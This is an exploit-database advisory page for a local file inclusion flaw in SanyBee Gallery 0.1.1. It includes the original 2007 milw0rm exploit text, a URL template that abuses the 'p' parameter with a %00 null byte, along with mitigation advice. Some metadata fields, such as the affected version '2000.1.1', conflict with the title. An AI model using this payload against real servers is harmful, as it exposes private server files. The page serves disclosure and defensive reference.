SanyBee Gallery 0.1.1 (p) local File Inclusion

vendor:

SanyBee Gallery

by:

jackal

N/A

CVSS

N/A

Local File Inclusion

Unknown

CWE

Product Name: SanyBee Gallery

Affected Version From: 2000.1.1

Affected Version To: 2000.1.1

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2007

SanyBee Gallery 0.1.1 (p) local File Inclusion

The vulnerability allows an attacker to include local files on the server by manipulating the 'p' parameter in the index.php file of SanyBee Gallery 0.1.1. By appending '%00' to the parameter, the attacker can bypass input validation and include arbitrary files.

Mitigation:

Apply a patch or update to a newer version of the script that fixes the vulnerability. Validate and sanitize user input to prevent file inclusion attacks.

Source

Exploit-DB raw data:

################################################################################
# SanyBee Gallery 0.1.1  (p)  local File Inclusion
#  
# Script Name:  SanyBee Gallery 0.1.1
#        
# D.Script: http://www.easy-script.com/scripts-dl/SanyBeeGallery_V0.1.0.zip
#                                                                                                            
# Discovered by:  jackal                                    
#
# contact: mi3adi@hotmail.fr                                                        
################################################################################


*==Exploit==*
================================================================

http://www.target.com/[SanyBee Gallery 0.1.1]/index.php?p=[ LFI ]%00
================================================================

Thanx: [cold-zer0]==&==[kof]==&==[firas]

GreeTz: [M]oRoCCaN [S]aBoTaGe [T]eaM

# milw0rm.com [2007-12-30]